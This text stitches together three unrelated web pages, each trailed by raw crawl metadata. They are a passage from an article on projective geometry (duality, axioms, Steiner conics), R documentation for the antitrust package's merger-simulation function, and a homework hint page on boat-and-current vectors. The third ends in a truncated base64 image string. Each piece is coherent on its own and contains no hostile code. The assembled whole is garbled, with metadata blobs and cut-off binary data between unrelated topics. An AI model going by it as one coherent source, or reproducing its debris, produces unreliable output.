distinguished. (In the later spirit of the Erlangen programme one could point to the way the group of transformations can move any line to the line at infinity).\n\nThe parallel properties of elliptic, Euclidean and hyperbolic geometries contrast as follows:\n\nGiven a line l and a point P not on the line,\nElliptic\nthere exists no line through P that does not meet l\nEuclidean\nthere exists exactly one line through P that does not meet l\nHyperbolic\nthere exists more than one line through P that does not meet l\n\nThe parallel property of elliptic geometry is the key idea that leads to the principle of projective duality, possibly the most important property that all projective geometries have in common.\n\n## Duality\n\nIn 1825, Joseph Gergonne noted the principle of duality characterizing projective plane geometry: given any theorem or definition of that geometry, substituting point for line, lie on for pass through, collinear for concurrent, intersection for join, or vice versa, results in another theorem or valid definition, the \"dual\" of the first. Similarly in 3 dimensions, the duality relation holds between points and planes, allowing any theorem to be transformed by swapping point and plane, is contained by and contains. More generally, for projective spaces of dimension N, there is a duality between the subspaces of dimension R and dimension N−R−1. For N = 2, this specializes to the most commonly known form of duality—that between points and lines. The duality principle was also discovered independently by Jean-Victor Poncelet.\n\nTo establish duality only requires establishing theorems which are the dual versions of the axioms for the dimension in question. Thus, for 3-dimensional spaces, one needs to show that (1*) every point lies in 3 distinct planes, (2*) every two planes intersect in a unique line and a dual version of (3*) to the effect: if the intersection of plane P and Q is coplanar with the intersection of plane R and S, then so are the respective intersections of planes P and R, Q and S (assuming planes P and S are distinct from Q and R).\n\nIn practice, the principle of duality allows us to set up a dual correspondence between two geometric constructions. The most famous of these is the polarity or reciprocity of two figures in a conic curve (in 2 dimensions) or a quadric surface (in 3 dimensions). A commonplace example is found in the reciprocation of a symmetrical polyhedron in a concentric sphere to obtain the dual polyhedron.\n\nAnother example is Brianchon's theorem, the dual of the already mentioned Pascal's theorem, and one of whose proofs simply consists of applying the principle of duality to Pascal's. Here are comparative statements of these two theorems (in both cases within the framework of the projective plane):\n\n• Pascal: If all six vertices of a hexagon lie on a conic, then the intersections of its opposite sides (regarded as full lines, since in the projective plane there is no such thing as a \"line segment\") are three collinear points. The line joining them is then called the Pascal line of the hexagon.\n• Brianchon: If all six sides of a hexagon are tangent to a conic, then its diagonals (i.e. the lines joining opposite vertices) are three concurrent lines. Their point of intersection is then called the Brianchon point of the hexagon.\n(If the conic degenerates into two straight lines, Pascal's becomes Pappus's theorem, which has no interesting dual, since the Brianchon point trivially becomes the two lines' intersection point.)\n\n## Axioms of projective geometry\n\nAny given geometry may be deduced from an appropriate set of axioms. Projective geometries are characterised by the \"elliptic parallel\" axiom, that any two planes always meet in just one line, or in the plane, any two lines always meet in just one point. In other words, there are no such things as parallel lines or planes in projective geometry.\n\nMany alternative sets of axioms for projective geometry have been proposed (see for example Coxeter 2003, Hilbert & Cohn-Vossen 1999, Greenberg 1980).\n\nThese axioms are based on Whitehead, \"The Axioms of Projective Geometry\". There are two types, points and lines, and one \"incidence\" relation between points and lines. The three axioms are:\n\n• G1: Every line contains at least 3 points\n• G2: Every two distinct points, A and B, lie on a unique line, AB.\n• G3: If lines AB and CD intersect, then so do lines AC and BD (where it is assumed that A and D are distinct from B and C).\n\nThe reason each line is assumed to contain at least 3 points is to eliminate some degenerate cases. The spaces satisfying these three axioms either have at most one line, or are projective spaces of some dimension over a division ring, or are non-Desarguesian planes.\n\nOne can add further axioms restricting the dimension or the coordinate ring. For example, Coxeter's Projective Geometry, references Veblen in the three axioms above, together with a further 5 axioms that make the dimension 3 and the coordinate ring a commutative field of characteristic not 2.\n\n### Axioms using a ternary relation\n\nOne can pursue axiomatization by postulating a ternary relation, [ABC] to denote when three points (not all necessarily distinct) are collinear. An axiomatization may be written down in terms of this relation as well:\n\n• C0: [ABA]\n• C1: If A and B are two points such that [ABC] and [ABD] then [BDC]\n• C2: If A and B are two points then there is a third point C such that [ABC]\n• C3: If A and C are two points, B and D also, with [BCE], [ADE] but not [ABE] then there is a point F such that [ACF] and [BDF].\n\nFor two different points, A and B, the line AB is defined as consisting of all points C for which [ABC]. The axioms C0 and C1 then provide a formalization of G2; C2 for G1 and C3 for G3.\n\nThe concept of line generalizes to planes and higher-dimensional subspaces. A subspace, AB...XY may thus be recursively defined in terms of the subspace AB...X as that containing all the points of all lines YZ, as Z ranges over AB...X. Collinearity then generalizes to the relation of \"independence\". A set {A, B, ..., Z} of points is independent, [AB...Z] if {A, B, ..., Z} is a minimal generating subset for the subspace AB...Z.\n\nThe projective axioms may be supplemented by further axioms postulating limits on the dimension of the space. The minimum dimension is determined by the existence of an independent set of the required size. For the lowest dimensions, the relevant conditions may be stated in equivalent form as follows. A projective space is of:\n\n• (L1) at least dimension 0 if it has at least 1 point,\n• (L2) at least dimension 1 if it has at least 2 distinct points (and therefore a line),\n• (L3) at least dimension 2 if it has at least 3 non-collinear points (or two lines, or a line and a point not on the line),\n• (L4) at least dimension 3 if it has at least 4 non-coplanar points.\n\nThe maximum dimension may also be determined in a similar fashion. For the lowest dimensions, they take on the following forms. A projective space is of:\n\n• (M1) at most dimension 0 if it has no more than 1 point,\n• (M2) at most dimension 1 if it has no more than 1 line,\n• (M3) at most dimension 2 if it has no more than 1 plane,\n\nand so on. It is a general theorem (a consequence of axiom (3)) that all coplanar lines intersect—the very principle Projective Geometry was originally intended to embody. Therefore, property (M3) may be equivalently stated that all lines intersect one another.\n\nIt is generally assumed that projective spaces are of at least dimension 2. In some cases, if the focus is on projective planes, a variant of M3 may be postulated. The axioms of (Eves 1997: 111), for instance, include (1), (2), (L3) and (M3). Axiom (3) becomes vacuously true under (M3) and is therefore not needed in this context.\n\n### Axioms for projective planes\n\nIn incidence geometry, most authors give a treatment that embraces the Fano plane PG(2, 2) as the smallest finite projective plane. An axiom system that achieves this is as follows:\n\n• (P1) Any two distinct points lie on a unique line.\n• (P2) Any two distinct lines meet in a unique point.\n• (P3) There exist at least four points of which no three are collinear.\n\nCoxeter's Introduction to Geometry gives a list of five axioms for a more restrictive concept of a projective plane attributed to Bachmann, adding Pappus's theorem to the list of axioms above (which eliminates non-Desarguesian planes) and excluding projective planes over fields of characteristic 2 (those that don't satisfy Fano's axiom). The restricted planes given in this manner more closely resemble the real projective plane.\n\n## Perspectivity and projectivity\n\nGiven three non- collinear points, there are three lines connecting them, but with four points, no three collinear, there are six connecting lines and three additional \"diagonal points\" determined by their intersections. The science of projective geometry captures this surplus determined by four points through a quaternary relation and the projectivities which preserve the complete quadrangle configuration.\n\nAn harmonic quadruple of points on a line occurs when there is a complete quadrangle two of whose diagonal points are in the first and third position of the quadruple, and the other two positions are points on the lines joining two quadrangle points through the third diagonal point. \n\nA spacial perspectivity of a projective configuration in one plane yields such a configuration in another, and this applies to the configuration of the complete quadrangle. Thus harmonic quadruples are preserved by perspectivity. If one perspectivity follows another the configurations follow along. The composition of two perspectivities is no longer a perspectivity, but a projectivity.\n\nWhile corresponding points of a perspectivity all converge at a point, this convergence is not true for a projectivity that is not a perspectivity. In projective geometry the intersection of lines formed by corresponding points of a projectivity in a plane are of particular interest. The set of such intersections is called a projective conic, and in acknowledgement of the work of Jakob Steiner, it is referred to as a Steiner conic.\n\nSuppose a projectivity is formed by two perspectivities centered on points A and B, relating x to X by an intermediary p:\n\n$x\\ {\\overset {A}{\\doublebarwedge }}\\ p\\ {\\overset {B}{\\doublebarwedge }}\\ X.$", null, "The projectivity is then $x\\ \\barwedge \\ X.$", null, "Then given the projectivity $\\barwedge$", null, "the induced conic is\n\n$C(\\barwedge )\\ =\\ \\bigcup \\{xX\\cdot yY:x\\barwedge X\\ \\ \\land \\ \\ y\\barwedge Y\\}.$", null, "Given a conic C and a point P not on it, two distinct secant lines through P intersect C in four points. These four points determine a quadrangle of which P is a diagonal point. The line through the other two diagonal points is called the polar of P and P is the pole of this line. Alternatively, the polar line of P is the set of projective harmonic conjugates of P on a variable secant line passing through P and C." ]
[ null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/2e7a2e48199993c482d0f25b04b7d6fbb932ac0d", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/7c8ad5bc35106903ce442079c36981c98a871350", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/594efe4b2136418958bd9587ce8a583e93e024a4", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/cb0d3a8a8fb958ea3c3b9d5ac435db05a64207fe", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.94329375,"math_prob":0.9641652,"size":24461,"snap":"2022-40-2023-06","text_gpt3_token_len":5235,"char_repetition_ratio":0.17872185,"word_repetition_ratio":0.0036119712,"special_character_ratio":0.19901067,"punctuation_ratio":0.103767045,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99450076,"pos_list":[0,1,2,3,4,5,6,7,8],"im_url_duplicate_count":[null,6,null,6,null,6,null,6,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-01-30T14:41:13Z\",\"WARC-Record-ID\":\"<urn:uuid:2d6b23ca-e184-45db-8b04-2159a5423523>\",\"Content-Length\":\"168067\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:298c7af7-fd18-46f4-bcfc-1df6d8f50f0c>\",\"WARC-Concurrent-To\":\"<urn:uuid:22257da9-5e2e-4b00-bab5-577db9384114>\",\"WARC-IP-Address\":\"107.180.50.172\",\"WARC-Target-URI\":\"https://webot.org/info/en/?search=Projective_geometry\",\"WARC-Payload-Digest\":\"sha1:TKSEECJGDGZFKHN2CO7GC3VL2SCT6L4U\",\"WARC-Block-Digest\":\"sha1:BPGZOVUZHGZZIVNTKML2AD7HQ3J5RVDH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764499819.32_warc_CC-MAIN-20230130133622-20230130163622-00647.warc.gz\"}"}
https://search.r-project.org/CRAN/refmans/antitrust/html/Sim-Functions.html
[ "Sim-Functions {antitrust} R Documentation\n\n## Merger Simulation With User-Supplied Demand Parameters\n\n### Description\n\nSimulates the price effects of a merger between two firms with user-supplied demand parameters under the assumption that all firms in the market are playing either a differentiated products Bertrand pricing game, 2nd price (score) auction, or bargaining game.\n\nLet k denote the number of products produced by all firms below.\n\n### Usage\n\n```sim(\nprices,\nsupply = c(\"bertrand\", \"auction\", \"bargaining\"),\ndemand = c(\"Linear\", \"AIDS\", \"LogLin\", \"Logit\", \"CES\", \"LogitNests\", \"CESNests\",\n\"LogitCap\"),\ndemand.param,\nownerPre,\nownerPost,\nnests,\ncapacities,\nmcDelta = rep(0, length(prices)),\nsubset = rep(TRUE, length(prices)),\ninsideSize = 1,\npriceOutside,\npriceStart,\nbargpowerPre = rep(0.5, length(prices)),\nbargpowerPost = bargpowerPre,\nlabels = paste(\"Prod\", 1:length(prices), sep = \"\"),\n...\n)\n```\n\n### Arguments\n\n `prices` A length k vector of product prices. `supply` A character string indicating how firms compete with one another. Valid values are \"bertrand\" (Nash Bertrand), \"auction2nd\" (2nd score auction), or \"bargaining\". `demand` A character string indicating the type of demand system to be used in the merger simulation. Supported demand systems are linear (‘Linear’), log-linear(‘LogLin’), logit (‘Logit’), nested logit (‘LogitNests’), ces (‘CES’), nested CES (‘CESNests’) and capacity constrained Logit (‘LogitCap’). `demand.param` See Below. `ownerPre` EITHER a vector of length k whose values indicate which firm produced a product pre-merger OR a k x k matrix of pre-merger ownership shares. `ownerPost` EITHER a vector of length k whose values indicate which firm produced a product after the merger OR a k x k matrix of post-merger ownership shares. `nests` A length k vector identifying the nest that each product belongs to. Must be supplied when ‘demand’ equals ‘CESNests’ and ‘LogitNests’. `capacities` A length k vector of product capacities. Must be supplied when ‘demand’ equals ‘LogitCap’. `mcDelta` A vector of length k where each element equals the proportional change in a product's marginal costs due to the merger. Default is 0, which assumes that the merger does not affect any products' marginal cost. `subset` A vector of length k where each element equals TRUE if the product indexed by that element should be included in the post-merger simulation and FALSE if it should be excluded.Default is a length k vector of TRUE. `insideSize` A length 1 vector equal to total units sold if ‘demand’ equals \"logit\", or total revenues if ‘demand’ equals \"ces\". `priceOutside` A length 1 vector indicating the price of the outside good. This option only applies to the ‘Logit’ class and its child classes Default for ‘Logit’,‘LogitNests’, and ‘LogitCap’ is 0, and for ‘CES’ and ‘CesNests’ is 1. `priceStart` A length k vector of starting values used to solve for equilibrium price. Default is the ‘prices’ vector for all values of demand except for ‘AIDS’, which is set equal to a vector of 0s. `bargpowerPre` A length k vector of pre-merger bargaining power parameters. Values must be between 0 (sellers have the power) and 1 (buyers the power). Ignored if ‘supply’ not equal to \"bargaining\". `bargpowerPost` A length k vector of post-merger bargaining power parameters. Values must be between 0 (sellers have the power) and 1 (buyers the power). Default is ‘bargpowerPre’. Ignored if ‘supply’ not equal to \"bargaining\". `labels` A k-length vector of labels. Default is “Prod#”, where ‘#’ is a number between 1 and the length of ‘prices’. `...` Additional options to feed to the optimizer used to solve for equilibrium prices.\n\n### Details\n\nUsing user-supplied demand parameters, `sim` simulates the effects of a merger in a market where firms are playing a differentiated products pricing game.\n\nIf ‘demand’ equals ‘Linear’, ‘LogLin’, or ‘AIDS’, then ‘demand.param’ must be a list containing ‘slopes’, a k x k matrix of slope coefficients, and ‘intercepts’, a length-k vector of intercepts. Additionally, if ‘demand’ equals ‘AIDS’, ‘demand.param’ must contain ‘mktElast’, an estimate of aggregate market elasticity. For ‘Linear’ demand models, `sim` returns an error if any intercepts are negative, and for both ‘Linear’, ‘LogLin’, and ‘AIDS’ models, `sim` returns an error if not all diagonal elements of the slopes matrix are negative.\n\nIf ‘demand’ equals ‘Logit’ or ‘LogitNests’, then ‘demand.param’ must equal a list containing\n\n• alphaThe price coefficient.\n\n• meanvalA length-k vector of mean valuations ‘meanval’. If none of the values of ‘meanval’ are zero, an outside good is assumed to exist.\n\nIf demand equals ‘CES’ or ‘CESNests’, then ‘demand.param’ must equal a list containing\n\n• gamma The price coefficient,\n\n• alphaThe coefficient on the numeraire good. May instead be calibrated using ‘shareInside’,\n\n• meanvalA length-k vector of mean valuations ‘meanval’. If none of the values of ‘meanval’ are zero, an outside good is assumed to exist,\n\n• shareInside The budget share of all products in the market. Default is 1, meaning that all consumer wealth is spent on products in the market. May instead be specified using ‘alpha’.\n\n### Value\n\n`sim` returns an instance of the class specified by the ‘demand’ argument.\n\n### Author(s)\n\nCharles Taragin [email protected]\n\nThe S4 class documentation for: `Linear`, `AIDS`, `LogLin`, `Logit`, `LogitNests`, `CES`, `CESNests`\n\n### Examples\n\n```## Calibration and simulation results from a merger between Budweiser and\n## Old Style. Note that the in the following model there is no outside\n## good; BUD's mean value has been normalized to zero.\n\n## Source: Epstein/Rubenfeld 2004, pg 80\n\nprodNames <- c(\"BUD\",\"OLD STYLE\",\"MILLER\",\"MILLER-LITE\",\"OTHER-LITE\",\"OTHER-REG\")\nownerPre <-c(\"BUD\",\"OLD STYLE\",\"MILLER\",\"MILLER\",\"OTHER-LITE\",\"OTHER-REG\")\nownerPost <-c(\"BUD\",\"BUD\",\"MILLER\",\"MILLER\",\"OTHER-LITE\",\"OTHER-REG\")\nnests <- c(\"Reg\",\"Reg\",\"Reg\",\"Light\",\"Light\",\"Reg\")\n\nprice <- c(.0441,.0328,.0409,.0396,.0387,.0497)\n\ndemand.param=list(alpha=-48.0457,\nmeanval=c(0,0.4149233,1.1899885,0.8252482,0.1460183,1.4865730)\n)\n\nsim.logit <- sim(price,supply=\"bertrand\",demand=\"Logit\",demand.param,\nownerPre=ownerPre,ownerPost=ownerPost)\n\nprint(sim.logit) # return predicted price change\nsummary(sim.logit) # summarize merger simulation\n\nelast(sim.logit,TRUE) # returns premerger elasticities\nelast(sim.logit,FALSE) # returns postmerger elasticities\n\ndiversion(sim.logit,TRUE) # return premerger diversion ratios\ndiversion(sim.logit,FALSE) # return postmerger diversion ratios\n\ncmcr(sim.logit) #calculate compensating marginal cost reduction\nupp(sim.logit) #calculate Upwards Pricing Pressure Index\n\nCV(sim.logit) #calculate representative agent compensating variation\n\n```\n\n[Package antitrust version 0.99.25 Index]" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.76453686,"math_prob":0.9621619,"size":6569,"snap":"2021-31-2021-39","text_gpt3_token_len":1724,"char_repetition_ratio":0.12581873,"word_repetition_ratio":0.15360169,"special_character_ratio":0.25163648,"punctuation_ratio":0.17024793,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98993623,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-27T07:56:34Z\",\"WARC-Record-ID\":\"<urn:uuid:a3670891-258f-4aff-9329-ce69c126cda7>\",\"Content-Length\":\"10655\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d15d7eb0-da24-4811-8667-a95186c73e60>\",\"WARC-Concurrent-To\":\"<urn:uuid:1cf63e9e-fefb-4235-aafc-f2f5154b0661>\",\"WARC-IP-Address\":\"137.208.57.46\",\"WARC-Target-URI\":\"https://search.r-project.org/CRAN/refmans/antitrust/html/Sim-Functions.html\",\"WARC-Payload-Digest\":\"sha1:MSN4X36MULO3FU5L2D542OXPXNND5JNL\",\"WARC-Block-Digest\":\"sha1:37LJCHIFWSNNIXOFBLMOOYQ3XP74VHXB\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046153223.30_warc_CC-MAIN-20210727072531-20210727102531-00426.warc.gz\"}"}
https://homework.cpm.org/category/CCI_CT/textbook/pc/chapter/10/lesson/10.1.2/problem/10-25
[ "", null, "", null, "### Home > PC > Chapter 10 > Lesson 10.1.2 > Problem10-25\n\n10-25.\n\nA boat is headed up a river at an angle of $25°$ with a rate of $20$ feet per second. The current is heading down stream at a rate of $5$ feet per second. The river is $100$ feet wide.\n\n1. Express the velocity of the boat as a vector in component form without including the effect of the river.", null, "2. The actual motion of the boat is the combination of the motion of the boat and the current in the river. Find the vector that gives the actual motion of the boat.\n\nUse vector addition to find the resultant vector.", null, "3. How long will it take the boat to cross the river?\n\nConsider the 'i' component of the resultant vector from part (b).\n\n4. How far up river will the boat arrive?\n\nConsider the 'j' component of the resultant vector from part (b). Multiply this by the number of seconds found in part (c).\n\n$19.044$ feet", null, "" ]
[ null, "https://homework.cpm.org/dist/7d633b3a30200de4995665c02bdda1b8.png", null, "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAfQAAABDCAYAAABqbvfzAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyRpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMC1jMDYxIDY0LjE0MDk0OSwgMjAxMC8xMi8wNy0xMDo1NzowMSAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNS4xIE1hY2ludG9zaCIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDo5QzA0RUVFMzVFNDExMUU1QkFCNEYxREYyQTk4OEM5NCIgeG1wTU06RG9jdW1lbnRJRD0ieG1wLmRpZDo5QzA0RUVFNDVFNDExMUU1QkFCNEYxREYyQTk4OEM5NCI+IDx4bXBNTTpEZXJpdmVkRnJvbSBzdFJlZjppbnN0YW5jZUlEPSJ4bXAuaWlkOjlDMDRFRUUxNUU0MTExRTVCQUI0RjFERjJBOTg4Qzk0IiBzdFJlZjpkb2N1bWVudElEPSJ4bXAuZGlkOjlDMDRFRUUyNUU0MTExRTVCQUI0RjFERjJBOTg4Qzk0Ii8+IDwvcmRmOkRlc2NyaXB0aW9uPiA8L3JkZjpSREY+IDwveDp4bXBtZXRhPiA8P3hwYWNrZXQgZW5kPSJyIj8+RSTQtAAAG9JJREFUeNrsXQmY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